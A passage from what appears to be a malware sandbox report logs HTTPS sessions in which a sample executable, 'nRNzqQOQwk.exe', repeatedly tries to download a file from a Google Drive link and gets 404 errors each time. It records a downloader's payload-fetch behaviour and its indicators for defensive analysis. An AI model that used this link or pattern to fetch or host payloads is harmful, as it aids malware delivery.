                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:26 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:25 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-a2Zzm39AqmIKJ1eyNA34YQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          57192.168.11.2049803142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:26 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:26 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5qtrPtrf2Pn6Vn6erPGfFCrkflvGsQd_kdKlUnUPCLe7jrcNdZIus4srMDKxPmQQYP
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:26 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-jvvcYuxu1kv3cttYFuUR5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:37:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 49 72 33 58 49 7a 4f 62 6b 33 75 50 52 52 6b 70 72 50 43 53 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cIr3XIzObk3uPRRkprPCSw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          58192.168.11.2049804142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:36 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:37 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:37 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-YkgMHx4yfvmk11Nnww6QeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          59192.168.11.2049805142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:37 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:37 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgQG8UH1SaxGn2miBV8IRlCvItB0d_hZKuhnxm_mgyjbcBS_pGVYwi70r53PS1f8OKE9
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:37 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-SNSH-tzagvYScy3jlsUV8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:37:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 65 6c 4e 52 4a 48 41 61 51 4c 67 42 6f 75 32 4d 62 6d 76 6c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oelNRJHAaQLgBou2MbmvlA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          60192.168.11.2049806142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:48 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:48 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:48 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-aRWrqBkoo-9qfyypsOtedw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          61192.168.11.2049807142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:48 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:49 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC4VlvnoEekSOfmMSxe5xbyRRgA3NbP9YSK1vrPVVLQnQJXVfTpZ7cs91oAyXGZeO9sD
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:48 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-d59Pk4tclHO7Lv-r60pu_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:37:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 59 4d 6d 36 62 6a 55 71 68 42 39 39 6e 56 33 6c 68 42 45 6d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CYMm6bjUqhB99nV3lhBEmw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          62192.168.11.2049808142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:59 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:37:59 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:37:59 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-tue5Bffo7-VM8FeJ8tQkIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          63192.168.11.2049809142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:37:59 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:38:00 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC59sotPYdc6k18dPqK7hPyfDpAs3BS1ns8BEg1Q4A2wuXhM8_BmqZhtek_Pz-QZuwQR
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:38:00 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-cjjRN4_ZjqFy-a7rYTDLUQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
